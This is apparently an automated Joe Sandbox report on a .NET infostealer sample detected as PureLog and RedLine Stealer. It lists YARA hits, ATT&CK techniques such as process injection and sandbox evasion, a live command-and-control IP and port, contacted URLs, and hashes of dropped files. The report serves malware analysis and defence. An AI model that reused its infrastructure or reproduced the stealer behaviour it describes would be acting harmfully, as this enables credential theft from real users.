Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.35dbb00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MfzXU6tKOq.exe PID: 1860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 744, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.4fa0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.340e790.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.4fa0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.340e790.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1841259145.0000000004FA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839022362.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.35dbb00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MfzXU6tKOq.exe PID: 1860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 744, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	11 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	3 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	241 Virtualization/Sandbox Evasion	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	113 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
MfzXU6tKOq.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.PureLogStealer
MfzXU6tKOq.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://185.222.58.82:55615	0%	Avira URL Cloud	safe
http://185.222.58.82:5	0%	Avira URL Cloud	safe
185.222.58.82:55615	0%	Avira URL Cloud	safe
http://www.sakkal.comne	0%	Avira URL Cloud	safe
http://185.222.58.82:55615t-kq	0%	Avira URL Cloud	safe
http://185.222.58.82:55615/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.222.58.82:55615/	true	Avira URL Cloud: safe	unknown
185.222.58.82:55615	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	false		high
http://www.fontbureau.com/designersG	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	false		high
http://www.fontbureau.com/designers/?	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettings	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/DataSet1.xsd	MfzXU6tKOq.exe	false		high
https://api.ip.sb/geoip	RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	false		high
http://www.fontbureau.com/designers	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.comne	MfzXU6tKOq.exe, 00000000.00000002.1841237299.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.222.58.82:5	RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironment	RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironmentResponse	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdates	RegSvcs.exe, 00000003.00000002.1992867983.00000000029C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.orgcookies//settinString.Removeg	MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	false		high
http://www.galapagosdesign.com/DPlease	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdate	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/0	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ipinfo.io/ip%appdata%	MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/	RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.ip.sb	RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	false		high
http://tempuri.org/Endpoint/CheckConnect	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	false		high
http://tempuri.org/Endpoint/SetEnviron	RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.222.58.82:55615t-kq	RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdatesResponse	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.222.58.82:55615	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.222.58.82	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1568226
Start date and time:	2024-12-04 13:16:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	MfzXU6tKOq.exe renamed because original name is a hash value
Original Sample Name:	3D63B777F65056B236BA51180CD37CE0.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/44@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 49 Number of non-executed functions: 10
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: MfzXU6tKOq.exe

Simulations

Behavior and APIs

Time	Type	Description
07:17:10	API Interceptor	1x Sleep call for process: MfzXU6tKOq.exe modified
07:17:23	API Interceptor	63x Sleep call for process: RegSvcs.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ROOTLAYERNETNL	lWnSA7IyVc.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	185.222.58.229
	8ZVd2S51fr.exe	Get hash	malicious	RedLine	Browse	185.222.58.241
	Purchase Order Purchase Order Purchase Order Purchase Order.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.222.57.90
	Purchase Order Purchase Order Purchase Order Purchase Order.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.222.57.90
	9dOKGgFNL2.exe	Get hash	malicious	RedLine	Browse	45.137.22.126
	RFQ List and airflight 2024.pif.exe	Get hash	malicious	PureLog Stealer	Browse	45.137.22.174
	Calyciform.exe	Get hash	malicious	GuLoader	Browse	45.137.22.248
	I5pvP0CU6M.exe	Get hash	malicious	RedLine	Browse	45.137.22.248
	gLsenXDHxP.exe	Get hash	malicious	RedLine	Browse	185.222.58.240
	DEVIS + FACTURE.exe	Get hash	malicious	Remcos, GuLoader	Browse	45.137.22.126

Process:	C:\Users\user\Desktop\MfzXU6tKOq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2666
Entropy (8bit):	5.345804351520589
Encrypted:	false
SSDEEP:	48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpHt1qHxLHjH4:vq5qxqdqolqztYqh3oPtI6mq7qoT5JNV
MD5:	90757169D333CB9247B01FB0CAF14023
SHA1:	C47A0AA0CBC960527EA4FA7F61AC1D08B56C23A5
SHA-256:	C04472992BF7CF58327D947D334F1105C14C5CF0D2DD0DF7E7873CAADE0EC61D
SHA-512:	A49B90272EC353DE49C508AF75C509D14A18EA50ABD1CD49BF5313A708CB9654A543E3340C74978B5756A66EF291132E93931853CAD7CC8C85450BB64A318031
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

C:\Users\user\AppData\Local\Temp\tmp1B6F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B70.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
